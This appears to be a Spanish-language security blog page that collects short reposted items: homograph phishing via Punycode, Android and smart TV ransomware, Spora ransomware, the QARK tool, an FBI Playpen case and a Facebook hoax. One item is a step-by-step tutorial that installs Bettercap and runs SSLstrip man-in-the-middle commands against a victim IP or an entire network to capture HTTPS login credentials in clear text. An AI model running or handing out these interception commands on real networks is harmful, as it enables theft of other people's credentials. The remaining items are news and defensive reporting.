Nuevas técnicas de #Phishing

Se ha confirmado un problema en Chrome y Firefox que podría permitir la realización de ataques de phishing mediante el uso de caracteres Unicode. Conocidos como ataques homográficos, representan un problema que los navegadores intentan evitar, pero se ha descubierto una forma para evitar los controles actuales. Se puede visitarhttps://www.аррӏе.com/ para entender las implicaciones.
Ahora bien, las implicaciones en el mundo de la seguridad que pueden representar estos dominios son grandes, ya que muchos caracteres Unicode pueden ser difíciles de distinguir de los caracteres ASCII normales. De esta forma, es posible registrar dominios como “xn--pple-43d.com”, equivalente a “аpple.com” por el uso de la a en cirílico “а” (U+0430) en vez de la “a” en ASCII (U+0041). Este tipo de ataques son conocidos como homográficos.Con el uso de Punycode se pueden representar caracteres Unicode mediante el subconjunto de caracteres ASCII empleado para los nombres en Internet. De esta forma se pueden registrar dominios que hagan uso de caracteres no permitidos, por ejemplo podríamos registrar un dominio como España.com que quedaría como xn--espaa-rta.com. Evidentemente no es muy empleado porque para temas como el SEO, promoción y marca, no es muy eficiente. Queda raro que haya que escribir algo como xn--espaa-rta.com.Los navegadores modernos tienen mecanismos para evitar o limitar este tipo de ataques. En Chrome y Firefox la forma Unicode se esconde si un dominio contiene caracteres de varios lenguajes diferentes. De esta forma, por ejemplo el dominio “xn--pple-43d.com” aparecerá como tal (en vez de “аpple.com”) al contar con caracteres de dos lenguajes, de esta forma se evita la confusión con el dominio real.

Pero el sistema de protección ante ataques homográficos falla si todos los caracteres son sustituidos con un carácter similar del mismo lenguaje. El dominio “аррӏе.com” registrado como “xn--80ak6aa92e.com” evita el filtro al emplear únicamente caracteres cirílicos. Esta forma de evitar la protección afecta a Chrome y Firefox, mientras que Internet Explorer, Microsoft Edge y Safari se libran del problema.

El desarrollador Xudong Zheng (@Xudong_Zheng) reportó el fallo a Chrome y Firefox el 20 de enero de 2017 y confirma que ha quedado corregido en la rama de Chrome 59, aunque finalmente se incluirá en Chrome 58 que estará disponible en torno a la semana que viene. Por ahora sigue sin corregir en Firefox ya que no han decidido si está dentro de su alcance.

Como contramedida en Firefox se puede configurar desde about:config y asignar network.IDN_show_punycode a true. Esto fuerza a Firefox a mostrar siempre los dominios IDN en su forma Punycode, lo que permite identificar los dominios maliciosos.

Fuente: Una al día

Obtener credenciales enviadas por HTTPs con SSLStrip y Bettercap

Aquí va un tutorial sobre cómo obtener las credenciales de sitios web que tengan cifrado SSL/TLS (HTTPS) mediante SSLstrip y el uso de un framework para realizar ataques MITM (ataque de hombre en el medio) llamado Bettercap.

¿Qué son las páginas HTTPs? ¿Qué diferencias hay con las HTTP?

Muchas veces, nos damos cuenta cuando accedemos a alguna web, que aparece un candado verde en la parte izquierda de la barra de direcciones, esto quiere decirnos, que nuestra conexión con el servidor es segura, es decir, el tráfico entre los dos puntos viaja cifrado.

Este tipo de páginas podemos encontrarlas en aquellas que requieran un nivel “extra” de seguridad debido a que se maneja información sensible como por ejemplo contraseñas, números de tarjeta de crédito o información confidencial.

Un ejemplo del uso de estas páginas pueden ser las web de los bancos, páginas dedicadas al comercio electrónico (tiendas online) o sitios populares como Google, Facebook o Twitter.

Podríamos decir que la diferencia entre HTTPs y HTTP es que la información se envía cifrada para evitar que un tercero capture el tráfico y vea lo que en ella se envía, el trafico HTTPs puede ser de igual manera capturado que el tráfico HTTP, pero no podríamos leer lo que contiene (en principio).

Bettercap y SSLstrip

Bettercap es un framework que se utiliza para realizar ataques MITM (Man In The Middle) o hombre en el medio, estos ataques consisten básicamente en interponerse entre 2 equipos para ver que datos se intercambian.

A continuación dejo unos links para ver en profundidad la herramienta.

Pero, ¿con interponerme en mitad de la conexión es suficiente?

Simplemente interponiéndonos en la conexión entre 2 equipos no es suficiente, necesitamos hacer uso de SSLstrip para poder leer lo que en ella se envía, más adelante lo veremos, pero aqui dejo un enlace hacia esta herramienta creada por Moxie Marlinspike.

Instalación de Bettercap.

Para instalar Bettercap, abrimos un terminal con permisos de superusuario y:

  1. Instalamos dependencias
apt-get install build-essential ruby-dev libpcap-dev

2. Clonamos el repositorio a nuestro equipo.

git clone https://github.com/evilsocket/bettercap

3. Nos posicionamos en la carpeta del proyecto.

cd bettercap

4. Construimos las gemas.

gem build bettercap.gemspec

5. Instalamos las gemas.

gem install bettercap*.gem

Uso de Bettercap y SSLstrip

Bettercap ya trae un módulo para realizar ataques SSLstrip, así que la utilizaremos para hacer un ataque de forma muy sencilla.

Abrimos una terminal y escribimos:

bettercap

Deberíamos de ver todos los dispositivos conectados a nuestra red. Visualizamos la IP de la víctima, que en mi caso sería la 192.168.100.251.

Luego, inicializamos Bettercap de la siguiente manera:

bettercap -T [IP VÍCTIMA] --proxy -P POST

En mi caso quedaría de la siguiente manera:

bettercap -T 192.168.100.251 –proxy -P POST

Si queremos que el ataque se realice a toda la red, simplemente no especificamos la IP de la víctima, y comenzará a captura todo el tráfico de red.

bettercap -T --proxy -P POST

Una vez la víctima acceda a cualquier página HTTPs (en este caso Facebook).

Podremos ver el tráfico descifrado, y por lo tanto, las credenciales en texto claro:

Fuente: Hackpuntes

[Infografía]: +1100 casos de #Ransomware en #Android durante Enero

Todos nos hemos topado con la palabra ransomware alguna vez, ya que es algo que da que hablar constantemente. Para aquellos que no lo conocen, se trata de un tipo de malware que se encarga de secuestrar un dispositivo con un método característico: cifrando los archivos con una clave secreta. Una extorsión que obliga al usuario a pagar un rescate económico para desbloquearlo; habitualmente mediante una criptomoneda. Incluso pagando el rescate existen casos en los que no puede recuperarse la información, ya que o nunca llegan a proporcionar la clave una vez hecho el pago o esta es inservible.

A pesar de ello, no se le muestra suficiente atención en Android, siendo aun el ordenador de sobremesa o servidor el objetivo habitual, posiblemente por razones estrictamente achacables al retorno de inversión. En este breve estudio, veremos si deberíamos, o no, preocuparnos por este tipo de malware en dispositivos móviles. Y constataremos como se está consolidando como una plataforma lucrativa para los creadores de ransomware. Read More

¿Qué necesitás saber sobre los permisos de apps en #Android?

Cuando se trata de malware, Android tiene un mecanismo de defensa muy bueno (el sistema de permisos de aplicaciones). Este sistema define una serie de acciones que una aplicación tiene permitidas (o no) para funcionar. Por defecto, todas las aplicaciones de Android funcionan en aislamiento de procesos (un entorno aislado). Si quieren acceder, editar o borrar información fuera de dicho aislamiento, necesitarán los permisos del sistema.

Los permisos se dividen en varias categorías, pero hablaremos solo de dos: normal y peligroso. Los permisos normales cubren acciones como el acceso a Internet, la creación de iconos, conexión Bluetooth, etc. Estos permisos se conceden por defecto y la aprobación del usuario no es necesaria.

Si una aplicación necesita uno de los permisos “peligrosos”, se requiere la confirmación del usuario. Entonces, ¿por qué se considera que algunos permisos son peligrosos? ¿De verdad son por naturaleza peligrosos? ¿En qué casos deberías permitirlos?

Permisos peligrosos

La categoría “peligrosa” incluye nueve grupos de permisos en los que las aplicaciones están, de algún modo, conectadas con la privacidad o seguridad del usuario. Cada grupo contiene varios permisos que una aplicación puede requerir.

Read More

#Spora: #Ransomware con servicio de atención al cliente y portal de compras

En la era del ransomware, plagada de familias que cifran archivos o bloquean dispositivos con el objetivo de que las víctimas paguen un rescate por ellos, era de esperar que algunas amenazas empiecen a querer diferenciarse del resto. Fue así como nació Spora, detectada por las soluciones de ESET como Win32/Filecoder.Spora.A; entre las varias peculiaridades que tiene, la que más llama la atención es la creación de un servicio de atención al cliente disponible en ruso y en inglés.

Desde su descubrimiento el mes pasado, las detecciones fueron en aumento especialmente en Rusia, que reúne el 71%. Un detalle: “spora” es “espora” en ruso, y fue en ese idioma que las primeras versiones de la amenaza exigían el pago de un rescate.

detecciones spora

Los cibercriminales realmente se han esforzado en este caso y se consideran “profesionales”, aunque podemos discernir a la hora de concederles que la creación y operación de malware es una profesión… De cualquier manera, Spora tiene una gran estructura detrás, la capacidad de trabajar offline, un portal de pago de rescates bastante desarrollado y, lo más sorprendente, una ventana de chat en tiempo real para que las víctimas se pongan en contacto con los operadores.

Este servicio de atención al cliente está disponible en ruso y en inglés, y busca fomentar la imagen “confiable” que pretenden dar estos ciberdelincuentes, prometiendo restituir archivos y accesos ni bien se pague el rescate, y ofreciendo extender los plazos a quienes no logren reunir el dinero. Además, piden con insistencia que los usuarios afectados les dejen críticas favorables una vez que ellos cumplan su palabra. Estamos de acuerdo en que por más cumplidores que sean, esta no deja de ser una actividad criminal y extorsiva, ¿verdad?

Estos son algunos ejemplos de las conversaciones que recogió Bleeping Computer:

chat spora

Es cierto que solemos decir que pagar no asegura la devolución de los archivos y en este caso parecería que hay más garantías, pero aun así, siempre es mejor prevenir que lamentar y tener que remediar una infección.

La forma más común de propagación es a través de spam de correos electrónicos que pretenden ser facturas de 1C, un popular software contable en Rusia y países cercanos. Esta técnica también había sido implementada por el ransomware Locky. Las supuestas facturas llegan en forma de archivos .ZIP que, a su vez, alojan archivos HTA (HTML Application) con doble extensión oculta (PDF.HTA o DOC.HTA), con el objetivo de pasar desapercibidos. Así, en los equipos Windows donde se oculte la extensión del archivo, el usuario solo vería la primera extensión ficticia.

Una vez que infecta el equipo, Spora despliega una complicada rutina que involucra la creación de un archivo .KEY y de una llave para cifrar los archivos de la víctima. “Spora está escrito en C y está empacado usando el packer ejecutable UPX. A diferencia de la mayoría de familias de ransomware, no renombra los archivos que cifra, por lo que no hay extensiones específicas asociadas. Al infectar un sistema, muestra una nota con el pedido de rescate basada en HTML y un archivo .KEY. El nombre base de ambos archivos es idéntico al ID que el ransomware le asigna a cada usuario”, explican desde Emsisoft. Es con este ID que las víctimas deben “hacer login” en un elegante sitio especialmente creado por los ciberdelincuentes para gestionar los pagos de rescate.

En síntesis, Spora se diferencia de otras familias de ransomware por las siguientes características:

  • Trabaja offline, por lo que no genera ningún tráfico de red a los servidores online.
  • Los archivos cifrados no cambian de nombre ni se les añade una extensión.
  • No tiene una lista demasiado grande de extensiones que desea cifrar, como sí tienen Locky, Cerber o CTB-Locker. Figuran las de ofimática, imágenes y archivos comprimidos.
  • Montó un atento servicio de atención al cliente y una desarrollada especie de tienda en línea que ofrece varias opciones de descifrado de archivos (dos sin cargo, uno por 30 dólares, restauración completa por 79). También ofrece “inmunidad” contra futuras infecciones y la remoción del malware.

Con tanta puesta en escena, probablemente Spora siga expandiéndose en los próximos meses, por lo que no sería de extrañar que deje de apuntar a usuarios de habla rusa y llegue a Latinoamérica. Para evitar ser víctima de este y otros ransomware, presta atención a este video:

Fuente: We Live Security

#QARK: Quick #Android Review Kit

QARK (Quick Android Review Kit) es una herramienta que está diseñada para buscar varias vulnerabilidades de seguridad relacionadas con el funcionamiento de aplicaciones de Android, ya sea en código fuente o en archivos empaquetados en APKs. Con la particularidad de que esta herramienta también es capaz de crear APKs desplegables como prueba de concepto o comandos ADB, capaces de explotar muchas de las vulnerabilidades que encuentran en Android. No es necesario tener privilegios de root el dispositivo de prueba, ya que esta herramienta se centra en vulnerabilidades que pueden ser explotadas bajo condiciones de un usuario común.

A diferencia de los productos comerciales, es 100% libre bajo las condiciones de la licencia Apache versión 2.0. QARK también ofrece información educativa que permite a los que están dando sus primeros pasos en el análisis de seguridad en Android localizar explicaciones precisas y en profundidad de las vulnerabilidades. QARK automatiza el uso de decompiladores múltiples, aprovechando sus salidas combinadas, para producir resultados mas precisos, al decompilar APKs. Por último, la mayor ventaja que tiene QARK sobre las herramientas tradicionales, es que no sólo apuntan a posibles vulnerabilidades, si no, que puede producir comandos ADB, o incluso APKs totalmente funcionales, que convierten las hipotéticas vulnerabilidades en explotaciones operativas “POC”.

Read More

Salteando las protecciones que ofrecen los AV’s

Black Hills Information Society hace todos los años un webcast llamado Sacred Cash Cow Tipping, donde muestran como bypassear la gran mayoría de los productos de AV y explican exactamente como lo hicieron. Ésto lo hacen para que las compañías entiendan que esos puntos de defensa no siempre representan una barrera de seguridad total para un atacante. Les dejo el último video que realizaron (2017), explicando sus ataques paso a paso:

Si quieren conocer más de ellos, visiten BlackHill InfoSec.

El #FBI retira cargos contra un pedófilo para evitar revelar su descubrimiento en la #DeepWeb

El FBI se ha visto en medio de un debate controvertido con respecto a la incriminación de Jay Michaud, un profesor de Instituto del estado de Washington, que presuntamente estaba relacionado con Playpen. Para quienes no sepan a qué nos referimos, se trata de una web de la Darknet dirigida a pedófilos.

Los agentes federales consiguieron pruebas de que Michaud era un usuario activo del foro de pederastas (si encuentras uno denúncialo siguiendo estos pasos) y que había comprado material ilegal, pero retiraron los cargos el pasado mes de diciembre para sorpresa de todo el mundo. La razón principal para ello es no divulgar la tecnología usada para identificar a pedófilos al gran público, según han publicado en DeepDotWeb.

Además del uso de medios de vigilancia electrónicos, también se registró el domicilio de este profesor, donde encontraron una colección de pornografía infantil y pruebas suficientes como para llevar el caso ante los tribunales. Pero hubo algo con lo que no contaban.

Read More

#Ransomware, infectando SmartTV’s

Era un problema que estaba ahí pero que no se ha dado importancia hasta hace unos pocos meses. La posibilidad de que un malware que afecta a Android ponga en jaque a los dispositivos Smart TV es una realidad.

La última compañía que ha comprobado estos problemas ha sido LG, fabricante que ha comprobado cómo varias de sus televisiones inteligentes quedaban inservibles.

Tal y como se puede observar en la siguiente imagen, parece que el dispositivo ha sido infectado por una variante del “virus de la policía”, pero en vez de bloquear el equipo bloquea sus archivos. Esto ha provocado además problemas a la hora de que el televisor funcione de forma adecuada. Al proceder al bloqueo de archivos importantes el dispositivo ha mostrado problemas para funcionar de forma correcta, pudiendo decir que ha quedado parcialmente inservible en esa situación.

Read More

El aviso de privacidad en #Facebook es ¡FALSO!

Los usuarios de Facebook volvieron al ruedo.

Una publicación pidiendo a los demás contactos que copien y peguen el mensaje si desean mantener el control de las cosas que comparten en Facebook está circulando de vuelta. Copiar y pegar por doquier… tal como sucedió el año pasado y probablemente siga ocurriendo con cierta periodicidad.

CUANTAS MÁS PERSONAS VEAN QUE SUS AMIGOS PUBLICARON EL MENSAJE, MÁS VAN A CREER QUE DEBERÍAN HACER LO MISMOY aunque en ese entonces ya explicamos por qué los avisos de copyright en Facebook no sirven, la fiebre del copy paste ha vuelto.

Read More